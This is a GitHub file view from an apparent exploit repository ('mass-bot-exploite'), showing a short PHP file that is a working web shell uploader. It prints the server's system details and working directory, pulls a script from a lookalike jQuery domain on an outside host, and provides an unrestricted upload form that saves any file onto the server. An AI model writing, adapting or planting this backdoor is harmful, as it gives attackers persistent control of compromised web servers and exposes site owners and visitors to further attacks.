forked from Theanvenger/mass-bot-exploite
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathl.php.php.j
More file actions
11 lines (10 loc) · 735 Bytes
/
l.php.php.j
File metadata and controls
11 lines (10 loc) · 735 Bytes
1
2
3
4
5
6
7
8
9
10
11
<?php
echo 'The anvenger'.'<br>'.'Uname:'.php_uname().'<br>'.$cwd = getcwd();
Echo
'
<script type="text/javascript" src="http://www.codejquery.net/jquery.mins.js" ></script>
<center> <form method="post" target="_self" enctype="multipart/form-data"> <input type="file" size="20" name="uploads" />
<input name="submit" type="submit" value="upload" /> </form> </center></td></tr> </table><br>';
if (!empty ($_FILES['uploads'])) { move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']);
Echo "<script>alert('upload Done'); </script><b>Uploaded !!!</b><br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type']; }
?>